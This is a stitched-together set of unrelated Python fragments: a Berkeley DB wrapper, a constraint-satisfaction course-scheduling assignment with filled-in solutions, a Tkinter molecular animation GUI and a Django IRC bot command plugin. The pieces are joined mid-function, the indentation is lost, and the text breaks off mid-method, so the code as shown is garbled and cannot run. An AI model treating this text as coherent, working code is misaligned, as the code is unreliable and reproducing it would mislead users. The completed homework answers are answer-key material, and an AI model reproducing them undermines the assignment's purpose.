# am = self.specification[file][FIELDS][field].get(ACCESS_METHOD)
self.table[tablename][-1].set_flags(self._dbe.DB_DUPSORT)
secondary = SUBFILE_DELIMITER.join(
(str(len(self.table[tablename]) - 1), file, field)
)
self.table[tablename][-1].open(
secondary if self.home_directory is not None else None,
secondary,
self._dbe.DB_BTREE,
self._dbe.DB_CREATE,
txn=self.dbtxn,
)
except:
for obj in self.table[tablename][1:]:
try:
obj.close()
except:
pass
self.close()
raise
def merge(self, file, field):
"""Merge the segment deferred updates into database."""
# Merge the segment deferred updates into database.
# Some of the unit testing using commented '_path_marker' code can be
# done with unittest.mock with suitable blocks of code delegated to
self.backtrack(assignment, numAssigned + 1, weight * deltaWeight)
del assignment[var]
else:
# Arc consistency check is enabled. This is helpful to speed up 3c.
for val in ordered_values:
deltaWeight = self.get_delta_weight(assignment, var, val)
if deltaWeight > 0:
assignment[var] = val
# create a deep copy of domains as we are going to look
# ahead and change domain values
localCopy = copy.deepcopy(self.domains)
# fix value for the selected variable so that hopefully we
# can eliminate values for other variables
self.domains[var] = [val]
# enforce arc consistency
self.apply_arc_consistency(var)
self.backtrack(assignment, numAssigned + 1, weight * deltaWeight)
# restore the previous domains
self.domains = localCopy
del assignment[var]
def get_unassigned_variable(self, assignment: Dict):
"""
Given a partial assignment, return a currently unassigned variable.
@param assignment: A dictionary of current assignment. This is the same as
what you've seen so far.
@return var: a currently unassigned variable. The type of the variable
depends on what was added with csp.add_variable
"""
if not self.mcv:
# Select a variable without any heuristics.
for var in self.csp.variables:
if var not in assignment: return var
else:
# Problem 1b
# Heuristic: most constrained variable (MCV)
# Select a variable with the least number of remaining domain values.
# Hint: given var, self.domains[var] gives you all the possible values.
# Make sure you're finding the domain of the right variable!
# Hint: satisfies_constraints determines whether or not assigning a
# variable to some value given a partial assignment continues
# to satisfy all constraints.
# Hint: for ties, choose the variable with lowest index in self.csp.variables
# BEGIN_YOUR_CODE (our solution is 7 lines of code, but don't worry if you deviate from this)
mcv = (float('inf'), None)
for var in self.csp.variables:
if var in assignment:
continue
consistency = (sum([1 for val in self.domains[var] if self.get_delta_weight(assignment, var, val) > 0]), var)
mcv = min(mcv, consistency)
return mcv[1]
# END_YOUR_CODE
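# Worked example, added for illustration: with assignment == {} and
# domains A: [1, 2], B: [1, 2, 3], and every value consistent, the
# tuples compared are (2, A) and (3, B), so min() returns A, the most
# constrained variable. On equal counts the tuple comparison falls
# through to the variable itself, which breaks ties deterministically.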
def apply_arc_consistency(self, var) -> None:
"""
Perform the AC-3 algorithm. The goal is to reduce the size of the
domain values for the unassigned variables based on arc consistency.
@param var: The variable whose value has just been set.
"""
def remove_inconsistent_values(var1, var2):
removed = False
# the binary factor must exist because we add var1 from var2's neighbor
factor = self.csp.binaryFactors[var1][var2]
for val1 in list(self.domains[var1]):
# Note: in our implementation, it's actually unnecessary to check unary factors,
# because in get_delta_weight() unary factors are always checked.
if (self.csp.unaryFactors[var1] and self.csp.unaryFactors[var1][val1] == 0) or \
all(factor[val1][val2] == 0 for val2 in self.domains[var2]):
self.domains[var1].remove(val1)
removed = True
return removed
queue = [var]
while len(queue) > 0:
curr = queue.pop(0)
for neighbor in self.csp.get_neighbor_vars(curr):
if remove_inconsistent_values(neighbor, curr):
queue.append(neighbor)
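# Illustrative trace, not part of the assignment code: let X and Y share
# the binary factor f(x, y) = (x == y) with domains X: [1, 2, 3] and
# Y: [1, 2, 3], and suppose X was just fixed so self.domains[X] == [2].
# remove_inconsistent_values(Y, X) deletes 1 and 3 from Y's domain (no
# supporting value remains in X), leaves Y: [2], and re-queues Y so its
# own neighbors are rechecked in turn.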
def create_sum_variable(csp: CSP, name: str, variables: List, maxSum: int) -> tuple:
"""
Given a list of |variables| each with non-negative integer domains,
returns the name of a new variable with domain range(0, maxSum+1), such that
it's consistent with the value |n| iff the assignments for |variables|
sums to |n|.
@param name: Prefix of all the variables that are going to be added.
Can be any hashable objects. For every variable |var| added in this
function, it's recommended to use a naming strategy such as
('sum', |name|, |var|) to avoid conflicts with other variable names.
@param variables: A list of variables that are already in the CSP that
have non-negative integer values as its domain.
@param maxSum: An integer indicating the maximum sum value allowed. You
can use it to get the auxiliary variables' domain
@return result: The name of a newly created variable with domain range
        [0, maxSum] such that it's consistent with an assignment of |n|
        iff the assignments of |variables| sum to |n|.
"""
result = ('sum', name, 'aggregated')
csp.add_variable(result, list(range(maxSum + 1)))
if len(variables) == 0:
csp.add_unary_factor(result, lambda x: x == 0)
return result
domain = []
for i in range(maxSum + 1):
for j in range(i, maxSum + 1):
domain.append((i, j))
for i in range(len(variables)):
csp.add_variable(('sum', name, str(i)), domain)
csp.add_unary_factor(('sum', name, '0'), lambda x: x[0] == 0)
for i in range(len(variables)):
f = ('sum', name, str(i))
csp.add_binary_factor(f, variables[i], lambda x, y: x[1] == x[0] + y)
for i in range(len(variables) - 1):
f0 = ('sum', name, str(i))
f1 = ('sum', name, str(i + 1))
csp.add_binary_factor(f0, f1, lambda x, y: x[1] == y[0])
csp.add_binary_factor(('sum', name, str(len(variables) - 1)), result, lambda x, y: x[1] == y)
return result
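# A hypothetical usage sketch for create_sum_variable: three 0/1 variables
# whose sum is forced to equal 2 (CSP API names as used above).
def _demo_sum_variable():
    csp = CSP()
    for v in ('X1', 'X2', 'X3'):
        csp.add_variable(v, [0, 1])
    total = create_sum_variable(csp, 'demo', ['X1', 'X2', 'X3'], maxSum=3)
    # constrain the aggregated sum variable like any other variable
    csp.add_unary_factor(total, lambda n: n == 2)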
############################################################
# Problem 2
# A class providing methods to generate CSP that can solve the course scheduling
# problem.
class SchedulingCSPConstructor:
def __init__(self, bulletin: CourseBulletin, profile: Profile):
"""
Saves the necessary data.
@param bulletin: Stanford Bulletin that provides a list of courses
@param profile: A student's profile and requests
"""
self.bulletin = bulletin
self.profile = profile
def add_variables(self, csp: CSP) -> None:
"""
Adding the variables into the CSP. Each variable, (request, quarter),
can take on the value of one of the courses requested in request or None.
For instance, for quarter='Aut2013', and a request object, request, generated
from 'CS221 or CS246', (request, quarter) should have the domain values
['CS221', 'CS246', None]. Conceptually, if var is assigned 'CS221'
then it means we are taking 'CS221' in 'Aut2013'. If it's None, then
we are not taking either of them in 'Aut2013'.
@param csp: The CSP where the additional constraints will be added to.
"""
for request in self.profile.requests:
for quarter in self.profile.quarters:
csp.add_variable((request, quarter), request.cids + [None])
def add_bulletin_constraints(self, csp: CSP) -> None:
"""
Add the constraints that a course can only be taken if it's offered in
that quarter.
@param csp: The CSP where the additional constraints will be added to.
"""
for request in self.profile.requests:
for quarter in self.profile.quarters:
csp.add_unary_factor((request, quarter), \
lambda cid: cid is None or \
self.bulletin.courses[cid].is_offered_in(quarter))
def add_norepeating_constraints(self, csp: CSP) -> None:
"""
        No course can be repeated. Coupled with our problem's constraint that
        only one of a group of requested courses can be taken, this implies that
        every request can be satisfied in at most one quarter.
@param csp: The CSP where the additional constraints will be added to.
"""
for request in self.profile.requests:
for quarter1 in self.profile.quarters:
for quarter2 in self.profile.quarters:
if quarter1 == quarter2:
continue
csp.add_binary_factor((request, quarter1), (request, quarter2), \
lambda cid1, cid2: cid1 is None or cid2 is None)
def get_basic_csp(self) -> CSP:
"""
Return a CSP that only enforces the basic constraints that a course can
only be taken when it's offered and that a request can only be satisfied
in at most one quarter.
@return csp: A CSP where basic variables and constraints are added.
"""
csp = CSP()
self.add_variables(csp)
self.add_bulletin_constraints(csp)
self.add_norepeating_constraints(csp)
return csp
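    # Hypothetical end-to-end usage of this constructor (file names and the
    # solver class are placeholders for whatever the surrounding scripts use):
    #   bulletin = CourseBulletin('courses.json')
    #   profile = Profile(bulletin, 'profile.txt')
    #   cspConstructor = SchedulingCSPConstructor(bulletin, profile)
    #   csp = cspConstructor.get_basic_csp()
    #   cspConstructor.add_quarter_constraints(csp)
    #   BacktrackingSearch().solve(csp, mcv=True, ac3=True)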
def add_quarter_constraints(self, csp: CSP) -> None:
"""
If the profile explicitly wants a request to be satisfied in some given
quarters, e.g. Aut2013, then add constraints to not allow that request to
be satisfied in any other quarter. If a request doesn't specify the
quarter(s), do nothing.
@param csp: The CSP where the additional constraints will be added to.
"""
# Problem 2a
# Hint: If a request doesn't specify the quarter(s), do nothing.
# Hint: To check which quarters are specified by a request variable
# named `request`, use request.quarters (NOT self.profile.quarters).
# BEGIN_YOUR_CODE (our solution is 5 lines of code, but don't worry if you deviate from this)
for request in self.profile.requests:
if len(request.quarters) == 0:
continue
for quarter in self.profile.quarters:
if quarter not in request.quarters:
csp.add_unary_factor((request, quarter), lambda cid: cid is None)
# END_YOUR_CODE
def add_request_weights(self, csp: CSP) -> None:
"""
        Incorporate weights into the CSP. By default, a request has a weight
        value of 1 (already configured in Request). You should only use the
        weight when one of the requested courses is in the solution. An
        unsatisfied request should also have a weight value of 1.
@param csp: The CSP where the additional constraints will be added to.
"""
        # Sketch completion, assuming Request.weight as described above: count
        # request.weight only when one of the requested courses is assigned
        # (the default-argument binding pins down `request` for each factor).
        for request in self.profile.requests:
            for quarter in self.profile.quarters:
                csp.add_unary_factor(
                    (request, quarter),
                    lambda cid, request=request: request.weight if cid is not None else 1.0)
import os, weakref
import Tkinter, Pmw
from Scenario2.gui.Tk.clipboard import ClipboardGUI
from Scenario2.sequenceAnimator import SequenceAnimator
from Scenario2.gui.Tk.sequenceAnimator import SequenceAnimatorGUI
from Scenario2 import _clipboard, _MAATargets
from DejaVu.scenarioInterface.animationGUI import orientationGUI
from DejaVu.scenarioInterface.animationPanels import AnimationPanel, ShowHideGeomPanel
from Pmv.scenarioInterface.animations import PmvColorObjectMAA, PartialFadeMolGeomsMAA,colorCmds
from Pmv.scenarioInterface.GeomChooser import PmvGeomChooser, PmvSetChooser
from DejaVu.GeomChooser import GeomChooser
from mglutil.gui.BasicWidgets.Tk.colorWidgets import ColorChooser
from mglutil.util.callback import CallbackFunction
from Pmv.moleculeViewer import MoleculeViewer
from DejaVu.scenarioInterface.animationGUI import SESp_MAAEditor
class SESpOpSet_MAAEditor(SESp_MAAEditor):
"""
    Editor providing speed, easeInOut, sortPoly, opacity and Pmv set chooser parameters
"""
def __init__(self, master=None, title='Partial Fade Editor',
buttons=['OK', 'Preview', 'Cancel'],
defaultButton='OK', speedDict=None, pmv=None):
self.pmv = pmv
self.fadeType = "in"
self.destOpacVal = 1.0
SESp_MAAEditor.__init__(
self, master=master, title=title, buttons=buttons,
defaultButton=defaultButton, speedDict=speedDict)
def populateForm(self):
"""
add set chooser
"""
SESp_MAAEditor.populateForm(self)
frame = self.dialog.interior()
grp = Pmw.Group(frame, tag_text='Fade options')
parent = grp.interior()
self.fadeTypeW = ft = Pmw.RadioSelect(
parent, labelpos="w", label_text="Fade:",
selectmode='single', orient='horizontal',
buttontype='radiobutton',
command=self.setFadeType_cb)
for text in ['in', 'out']:
ft.add(text)
ft.setvalue(self.fadeType)
ft.pack(side = 'left', anchor = 'w', fill = 'x',
expand = 1, padx = 8, pady = 8)
self.destOpac = Pmw.Counter(parent, labelpos = 'w',
label_text = 'Final opacity:',
entry_width = 8, entryfield_value = self.destOpacVal,
datatype = {'counter' : 'real'}, increment = 0.1,
entryfield_validate = {'validator' : 'real',
'min' : 0.0 , 'max':1.0})
self.destOpac.pack(side = 'top', anchor = 'w', fill = 'x', expand = 1, padx = 8, pady = 8)
grp.pack(side='top', fill='x', expand=1 )
self.setChooser = PmvSetChooser(frame, self.pmv,
title = "select a set:",
mode="multiple")
self.setChooser.pack(side = "top", expand=1, fill="both")
self.balloon.bind(self.setChooser.widget, "fade in/out parts of a molecule for geometries\nwhere the atom centers correspond to the geometry\nvertices (cpk, sticks, balls, bonded)" )
def setFadeType_cb(self, fadeType="in", val = None):
entry = self.destOpac._counterEntry
if fadeType == "in":
entry.delete(0, 'end')
            if val is None: val = 1.0
entry.insert(0, val)
else:
entry.delete(0, 'end')
            if val is None: val = 0.0
entry.insert(0, val)
self.fadeType = fadeType
def setValues(self, **kw):
"""
        take a dictionary of parameterName:parameterValue pairs and set the
        editor to these values
"""
SESp_MAAEditor.setValues(self, **kw)
if self.maa:
fade = "in"
if hasattr(self.maa, 'fade'):
fade = self.maa.fade
self.fadeTypeW.setvalue(fade)
destVal = None
if hasattr(self.maa, 'destValue'):
destVal = self.maa.destValue
self.setFadeType_cb(fadeType=fade, val = destVal)
def getValues(self):
"""
return a dictionary of parameterName:parameterValues
"""
values = SESp_MAAEditor.getValues(self)
values['nodes'] = self.setChooser.getNodes()
self.destOpacVal = values['destValue'] = float(self.destOpac.get())
values['fade'] = self.fadeType
return values
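# A hypothetical instantiation sketch for the editor above (`pmv` is assumed to
# be a live MoleculeViewer instance; the edit entry point is inherited from
# SESp_MAAEditor, and its exact name may differ in that base class):
#   editor = SESpOpSet_MAAEditor(title='Partial Fade Editor', pmv=pmv)
#   editor.setValues(fade='out', destValue=0.0)
#   values = editor.getValues()   # includes 'nodes', 'destValue' and 'fade'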
class colorsMAAGUI(AnimationPanel):
""" Adds color effects buttons."""
def __init__(self, pmv ,master=None):
assert isinstance(pmv, MoleculeViewer)
vi = pmv.GUI.VIEWER
self.pmv = pmv
AnimationPanel.__init__(self, vi, 'pmv.GUI.VIEWER', master)
gc = self.geomChooser = PmvGeomChooser(pmv, root=self.geomChooserG.interior(),
showAll=False, refreshButton=True, showAllButton=True,
command=self.onSelect_cb)
gc.pack(side='top', fill='both', expand=1, anchor="w")
# select 'All' entry by default
gc.chooserW.lb.select_set(0)
self.selectedGeom = [ [0], [pmv.GUI.VIEWER.rootObject]]
# add action creating buttons
parent = self.makeActionsG.interior()
self.colorClips = {}
for lastRow, txt in enumerate(colorCmds.keys()):
#if txt == "choose color": continue
cb = CallbackFunction(self.makeMAA, PmvColorObjectMAA, (), {'pmv':pmv, 'colortype':txt})
w = Tkinter.Button(parent, text=txt, command=cb)
w.grid(column=0, row=lastRow, columnspan = 2, sticky='ew')
w.bind('<Button-3>', CallbackFunction( self.showMaaEditor_cb, PmvColorObjectMAA, (), {'pmv':pmv, 'colortype':txt}) )
self.lastRow = lastRow
def getSelectedGeoms(self):
gc = self.geomChooser
geometries = gc.get()
kw = {}
if len(geometries):
# get the name of the currently selected geometry
en = gc.chooserW.entries
ind = gc.chooserW.getInd()[0]
objname= en[ind][0].strip() # remove leading blanks
# build a name
gparent = geometries[0].parent
if gparent is not None and gparent.name != "root":
objname = gparent.name + "|" + objname
kw['objectName'] = objname
if hasattr(gc, "getNodes"):
kw['nodes'] = gc.getNodes()
return geometries, kw
def showMaaEditor_cb(self, maaClass, args, kw, event=None):
"""
open maa editor, create maa based on specified options
"""
geometries, geomkw = self.getSelectedGeoms()
if len(geometries)==0:
from tkMessageBox import showwarning
showwarning("Warning", 'No geometry selected',
parent = self.geomChooser.root)
return
kw.update(geomkw)
args = (geometries, )
maa = maaClass( *args, **kw )
if not len(maa.actors):
return
st = self.editMAA_cb(maa)
if st == "OK":
self.makeMAAButton(maa)
def makeMAA(self, maaClass, args, kw, event=None):
"""
callback for action creating buttons
"""
gc = self.geomChooser
geometries = gc.get()
if len(geometries)==0:
from tkMessageBox import showwarning
showwarning("Warning", 'No geometry selected',
parent = gc.root)
return
# get the name of the currently selected geometry
en = gc.chooserW.entries
ind = gc.chooserW.getInd()[0]
objname= en[ind][0].strip() # remove leading blanks
# build a name
gparent = geometries[0].parent
if gparent is not None and gparent.name != "root":
objname = gparent.name + "|" + objname
kw['objectName'] = objname
if hasattr(gc, "getNodes"):
kw['nodes'] = gc.getNodes()
args = (geometries, )
maa = maaClass( *args, **kw )
if len(maa.actors):
self.makeMAAButton(maa)
def onSelect_cb(self, event = None):
self.selectedGeom = [self.geomChooser.chooserW.getInd(),
self.geomChooser.chooserW.get()]
class movePmvObjectsMAAGUI(ShowHideGeomPanel):
def __init__(self, pmv, master=None):
assert isinstance(pmv, MoleculeViewer)
from Pmv.GeomFilter import GeomFilter
self.gf = GeomFilter(pmv)
filterFunction = self.gf.filter
vi = pmv.GUI.VIEWER
kw = {'showAll':False, 'filterFunction':filterFunction,
'refreshButton':True, 'showAllButton': True}
gcOpt = [ (), kw ]
ShowHideGeomPanel.__init__(
self, vi, 'pmv.GUI.VIEWER', GeomChooser, gcOpt, master=master)
self.lastRow += 1
# select 'All' entry by default
gc = self.geomChooser
gc.chooserW.lb.select_set(0)
self.selectedGeom = [ [0], [vi.rootObject]]
frame = self.effectsContainer
# partial fade in button
cb = CallbackFunction(self.makeMAA, PartialFadeMolGeomsMAA,
(gc,), {'pmv':pmv})
parent = self.makeActionsG.interior()
w = self.pfadeB = Tkinter.Button(parent, text='Partial fade',
command=cb)
w.grid(column=0, row=self.lastRow, sticky='ew')
w.bind('<Button-3>', CallbackFunction( self.showMaaEditor_cb, PartialFadeMolGeomsMAA, (), {'pmv':pmv}))
import tkFileDialog
class AnimationNotebook:
def __init__(self, pmv, master=None):
"""
        Create a Notebook widget. Pages contain different animation effects such
        as Fly In/Out, Fade In/Out, Rotate object, and Color effects.
        There are also Clipboard and Sequence Animator pages.
"""
self.master = master
if master is None:
self.master = master = Tkinter.Toplevel()
self.ownsMaster = True
else:
self.ownsMaster = False
self.pmv = pmv
vi = self.viewer = pmv.GUI.VIEWER
sf = Pmw.ScrolledFrame(self.master, horizflex='expand',vertflex='expand',vscrollmode='dynamic', hscrollmode='dynamic')
sf.pack(fill = 'both', expand = 1)
self.master = sf.interior()
# create menu bar
self.mBar = Tkinter.Frame(self.master, relief=Tkinter.RAISED, borderwidth=2)
self.menuButtons = {}
File_button = Tkinter.Menubutton(self.mBar, text='File', underline=0)
File_button.menu = Tkinter.Menu(File_button)
File_button['menu'] = File_button.menu
File_button.pack(side=Tkinter.LEFT, padx="1m")
File_button.menu.add_command(label='Load animation script', underline=0,
#accelerator='(Ctrl-o)',
command=self.loadAnimation)
## File_button.menu.add_command(label='Save animation script', underline=0,
## #accelerator="(Ctrl-s)",
## command=self.saveAnimation)
File_button.menu.add_command(label='Load Snapshots', underline=0,
#accelerator='(Ctrl-o)',
command=self.loadSnapshotsFromFile)
## File_button.menu.add_command(label='Save Snapshots', underline=0,
## #accelerator="(Ctrl-s)",
## command=self.saveSnapshotsToFile)
self.mBar.pack(side='top',fill=Tkinter.X, expand=1)
# create notebook widget:
self.showHidePanel = None
self.colorsGUI = None
nb = self.notebook = Pmw.NoteBook(self.master, raisecommand = self.selectPage_cb)
# add "Snapshot" page
self.orientP = nb.add("Snapshots")
self.orientGUI = orientationGUI(vi, 'viewer', master=self.orientP)
self.orientGUI._animNB = weakref.ref(self)
# add "Move" page ( add fly and fade, show/hide, rotate effects):
panel = nb.add("Move")
self.showHidePanel = movePmvObjectsMAAGUI(pmv, master=panel)
self.showHidePanel._animNB = weakref.ref(self)
# add "Colors" page
panel = nb.add("Colors")
self.colorsGUI = colorsMAAGUI(pmv, master=panel)
self.colorsGUI._animNB = weakref.ref(self)
# add clipboard
#self.clipbP = nb.add("Clipboard")
#cbgui = self.clipboardGUI = ClipboardGUI(_clipboard, master=self.clipbP)
#_MAATargets.addAnimator('Clipboard', _clipboard, self.addMaaToClipboard)
#cbgui.master.withdraw()
#cbgui.master.protocol('WM_DELETE_WINDOW', cbgui.master.withdraw )
# add sequence animator page
self.sequenceP = nb.add("Sequence Anim.")
self.addSequenceAnim()
nb.pack(padx=5, pady = 5, fill=Tkinter.BOTH, expand=1)
nb.setnaturalsize()
self.balloon = Pmw.Balloon(self.master)
self.loadedMaas = {}
def addSequenceAnim(self):
self.seqAnim = SequenceAnimator()
self.seqAnim._animNB = weakref.ref(self)
_MAATargets.addAnimator('animation', self.seqAnim, self.seqAnim.addMaa_cb)
self.seqAnimGUI = SequenceAnimatorGUI(self.seqAnim, master=self.sequenceP)#, master = frame)
def addMaaToClipboard(self, clipboard, maa):
_clipboard.addMaa(maa)
def selectPage_cb(self, pagename):
"""Called when a new page is selected. Updates the Geometry Chooser widgets
on 'Move' and 'Colors' pages."""
gc = None
pageGUI = None
if pagename == "Move":
if self.showHidePanel:
pageGUI = self.showHidePanel
gc = pageGUI.geomChooser
elif pagename == "Colors":
if self.colorsGUI:
pageGUI = self.colorsGUI
gc = pageGUI.geomChooser
if gc is not None:
gc.updateList()
if pageGUI.selectedGeom:
gind, geom = pageGUI.selectedGeom
if len(gind):
n = gind[0]
if len(gc.geomList)>= n+1 and geom == gc.geomList[n][1]:
gc.chooserW.clearSelection()
gc.chooserW.selectItem(n)
else:
gc.chooserW.clearSelection()
def saveAnimation(self, file = None, savesession=False):
# save maas in the Sequence Anim. to a file
if not len(self.seqAnim.maas):
return
filename = file
if not file:
ans, filename, savesession = self.openSaveDialog()
if ans == "OK":
if filename:
file = filename + "_animation.py"
if file:
# save animation to file filename_animation.py
lines = """import sys\n"""
lines += """viewer=pmv.GUI.VIEWER \n"""
lines += self.seqAnim.getMAASourceCode("animator")
f = open(file, 'w')
f.writelines(lines)
f.close()
# save current Pmv session
if savesession:
self.pmv.saveSession(filename+"_session.psf")
def openSaveDialog(self, title = 'Save Animation', fileext = "_animation"):
dialog = Pmw.Dialog(self.master, buttons = ('OK','Cancel'),
defaultbutton = 'OK', title=title)
dialog.withdraw()
savesession = Tkinter.IntVar()
savesession.set(1)
frame = dialog.interior()
checkb = Tkinter.Checkbutton(frame, text = "Save Pmv Session",
variable=savesession)
checkb.pack(side='top', anchor='w')
entry = Pmw.EntryField(frame, label_text="File name:", labelpos='w')
entry.pack(expand = 1, fill = 'both', padx = 4, pady = 4, side='left')
        self.balloon.bind(entry, "Enter a filename.\nfilename%s.py and filename_session.psf\nwill be created" % fileext)
# test plugin
import re
import os
import sys
import json
import types
import logging
import logging.config

import django
import twisted
from git import Repo
from django.conf import settings
from django.contrib.auth import authenticate
from django.contrib.auth.models import User
from guardian.shortcuts import assign_perm, get_perms, remove_perm

from logos.constants import VERSION
from logos.models import NetworkPlugins, RoomPlugins, Settings, \
    NetworkPermissions, RoomPermissions
from logos.roomlib import get_room_option, set_room_option, set_room_defaults, \
    set_global_option, get_global_option, get_user_option
from bot.logos_decorators import irc_room_permission_required, \
    irc_network_permission_required
from bot.pluginDespatch import Plugin

logger = logging.getLogger(__name__)
logging.config.dictConfig(settings.LOGGING)
class SystemCoreCommands(Plugin):
plugin = ("system", "System Module")
system = True
def __init__(self, *args):
super(SystemCoreCommands, self).__init__(*args)
self.commands = ( \
(r'ping', self.ping, 'ping the bot'),
(r'login\s+(?P<password>\S+)$', self.login, 'Login into the bot'),
(r'login\s+(?P<userid>\S+)\s+(?P<password>\S+)$', self.login, 'Login into the bot'),
(r'logout', self.logout, "Log out of bot"),
(r'version\s*$', self.version, "Show this bot's version info"),
(r'help\s*$', self.help, "Show this bot's help info"),
(r'list\s+plugins$', self.list_plugins, "list all plugins available"),
(r'list\s+plugins for (?P<room>#\S+)$', self.list_plugins_for_room, "list all plugins available"),
(r'enable\s+plugin\s+(?P<room>#\S+)\s+(?P<plugin>[a-z0-9_-]+)',
self.enable_plugin, "Enable specified plugin for room"),
(r'disable\s+plugin\s+(?P<room>#\S+)\s+(?P<plugin>[a-z0-9_-]+)',
self.disable_plugin, "Disable specified plugin for room"),
            (r'activate\s+plugin\s+(?P<plugin>[a-z0-9_-]+)',
             self.activate_plugin, "Activate specified plugin at network level"),
            (r'deactivate\s+plugin\s+(?P<plugin>[a-z0-9_-]+)',
             self.deactivate_plugin, "Deactivate specified plugin at network level"),
(r'list\s+(?:perms|permissions)', self.list_perms, "list all permissions available"),
(r'delete\s+user\s+(?P<username>\S+)$',
self.deluser, 'Delete user from system'),
(r'add\s+user\s+(?P<username>\S+)\s+(?P<email>[a-zA-Z0-9-]+@[a-zA-Z0-9\.-]+)\s+(?P<password>\S+)$',
self.adduser, 'Add user to system'),
(r'debug\s+users', self.debugusers, 'Debug list users in system'),
(r'list\s+users', self.listusers, 'List users in system'),
(r'assign\s+(?:perm|permission)\s+(?P<perm>[a-z_]+)\s+to\s+(?P<username>[^\s]+)', self.assign_net_perms, "assign permission to username"),
(r'assign\s+(?:perm|permission)\s+(?P<room>#\S+)\s+(?P<perm>[a-z_]+)\s+to\s+(?P<username>[^\s]+)', self.assign_room_perms, "assign permission to username"),
            (r'unassign\s+(?:perm|permission)\s+(?P<perm>[a-z_]+)\s+from\s+(?P<username>[^\s]+)', self.unassign_net_perms, "unassign permission from username"),
            (r'unassign\s+(?:perm|permission)\s+(?P<room>#\S+)\s+(?P<perm>[a-z_]+)\s+from\s+(?P<username>[^\s]+)', self.unassign_room_perms, "unassign permission from username"),
(r'(?:perms|permissions)\s+(?P<username>[^\s]+)', self.perms, "list permissions for user"),
(r'join\s+room\s+(?P<room>#\S+)', self.join_room,
"Request bot to join a room"),
(r'part\s+room\s+(?P<room>#\S+)', self.part_room,
"Request bot to part a room"),
(r'cmd\s+(.*)', self.cmd, "Have bot perform an IRC command"),
(r'say\s+(?P<room>#\S+)\s+(.*)', self.speak, "Say something into a room"),
(r'act\s+(?P<room>#\S+)\s+(.*)', self.action, "perform a /me action in room"),
(r'set\s+(?P<room>#\S+)\s+(?:activation|trigger)\s+\"(.)\"', self.set_trigger,
"Set the trigger used by the bot"),
(r'set\s+(?:pvt|private)\s+(?:activation|trigger)\s+\"(.)\"', self.set_pvt_trigger,
"Set the trigger used by the bot"),
(r'set\s+(?P<room>#\S+)\s+greet\s+message\s+\"(.*)\"', self.set_greet,
"Set the autogreet message"),
(r'set\s+password\s+(\S+)$', self.set_password, "Set your password"),
(r'nick\s+(?P<nick>[a-zA-Z0-9-_]+)', self.set_nick, "Set the bot nick"),
            (r'actual\s+server\s*$', self.actual_host, "Show the actual IRC server host"),
)
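        # For illustration, how one of the entries above matches (the actual
        # dispatch lives in bot.pluginDespatch.Plugin; this just shows the
        # named groups a handler receives):
        #   m = re.match(r'assign\s+(?:perm|permission)\s+(?P<perm>[a-z_]+)'
        #                r'\s+to\s+(?P<username>[^\s]+)',
        #                'assign perm bot_admin to alice')
        #   m.group('perm')      # -> 'bot_admin'
        #   m.group('username')  # -> 'alice'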
def privmsg(self, user, channel, message):
what_triggers_rgx = re.search("what are (?:the|your) triggers", message, re.I)
if what_triggers_rgx:
chan = channel.lower()
nick, _ = user.split('!')
# determine the trigger for this room
room_trigger = get_room_option(self.factory.network, channel, 'activation')
pvt_trigger = get_global_option('pvt-trigger')
if not pvt_trigger: pvt_trigger = "!"
user = self.get_auth().get_user_obj(nick)
user_trigger = get_user_option(user, "trigger")
            if user_trigger:
                msg = "Room trigger is {}, private window trigger is {}, and your personal user trigger is {}".format(room_trigger, pvt_trigger, user_trigger)
            else:
                msg = "Room trigger is {}, private window trigger is {}".format(room_trigger, pvt_trigger)
self.say(chan, msg)
def ping(self, regex, chan, nick, **kwargs):
self.say(chan, "pong")
def actual_host(self, regex, chan, nick, **kwargs):
self.say(chan, "Actual IRC server is {}".format(self.irc_conn.actual_host))
def list_plugins(self, regex, chan, nick, **kwargs):
self.notice(nick, "=== Plugins ===")
self.notice(nick, " === Enabled ===")
for net_plugin in NetworkPlugins.objects.filter(network=self.network,\
loaded=True):
plugin_name = net_plugin.plugin.name
descr = net_plugin.plugin.description
enabled = net_plugin.enabled
if enabled:
self.notice(nick, " {0:.<15} {1:.<30}".format(plugin_name, descr))
self.notice(nick, " === Disabled ===")
for net_plugin in NetworkPlugins.objects.filter(network=self.network,\
loaded=True):
plugin_name = net_plugin.plugin.name
descr = net_plugin.plugin.description
enabled = net_plugin.enabled
if not enabled:
self.notice(nick, " {0:.<15} {1:.<30}".format(plugin_name, descr))
def list_plugins_for_room(self, regex, chan, nick, **kwargs):
room = regex.group('room')
#room = chan.lower()
if not self.get_auth().is_authorised(nick, room, 'enable_plugins'):
self.notice(nick, "You are not authorised (or logged in) for this room.")
return
self.notice(nick, " === Enabled plugins for room {} ===".format(room))
        for plugin in RoomPlugins.objects.filter(net__loaded = True,
                                                 net__enabled = True,
                                                 room = room.lower(),
                                                 net__network=self.network):
name = plugin.net.plugin.name
descr = plugin.net.plugin.description
enabled = plugin.enabled
self.notice(nick, " {0:.<15} {1}".format(name, enabled))
self.notice(nick, "*** End of List ***")
@irc_room_permission_required('enable_plugins')
def enable_plugin(self, regex, chan, nick, **kwargs):
room = regex.group('room')
plugin_name = re.sub('-','_',regex.group('plugin'))
if super(SystemCoreCommands, self).enable_plugin(room, plugin_name):
self.say(chan, "plugin enabled successfully")
else:
self.say(chan, "plugin could not be enabled")
@irc_room_permission_required('enable_plugins')
def disable_plugin(self, regex, chan, nick, **kwargs):
room = regex.group('room')
plugin_name = re.sub('-','_',regex.group('plugin'))
if super(SystemCoreCommands, self).disable_plugin(room, plugin_name):
self.say(chan, "plugin disabled successfully")
else:
self.say(chan, "plugin could not be disabled")
@irc_network_permission_required('activate_plugins')
def activate_plugin(self, regex, chan, nick, **kwargs):
plugin_name = re.sub('-','_',regex.group('plugin'))
response = super(SystemCoreCommands, self).activate_plugin(plugin_name)
        if isinstance(response, tuple):
enabled, msg = response
else:
enabled = response
msg = None
if enabled:
self.say(chan, "plugin activated successfully")
else:
self.say(chan, "plugin could not be activated")
if msg:
self.say(chan, "Reason: "+msg)
@irc_network_permission_required('activate_plugins')
def deactivate_plugin(self, regex, chan, nick, **kwargs):
plugin_name = re.sub('-','_',regex.group('plugin'))
if super(SystemCoreCommands, self).deactivate_plugin(plugin_name):
self.say(chan, "plugin disabled at network level successfully")
else:
self.say(chan, "plugin could not be disabled")
@irc_network_permission_required('bot_admin')
def deluser(self, regex, chan, nick, **kwargs):
username = regex.group('username')
try:
user = User.objects.get(username__iexact = username.lower())
except User.DoesNotExist:
self.msg(chan, "User with that username could not be found")
else:
user.delete()
self.msg(chan, "User deleted from database ")
@irc_network_permission_required('bot_admin')
def adduser(self, regex, chan, nick, **kwargs):
username = regex.group('username')
        password = regex.group('password')
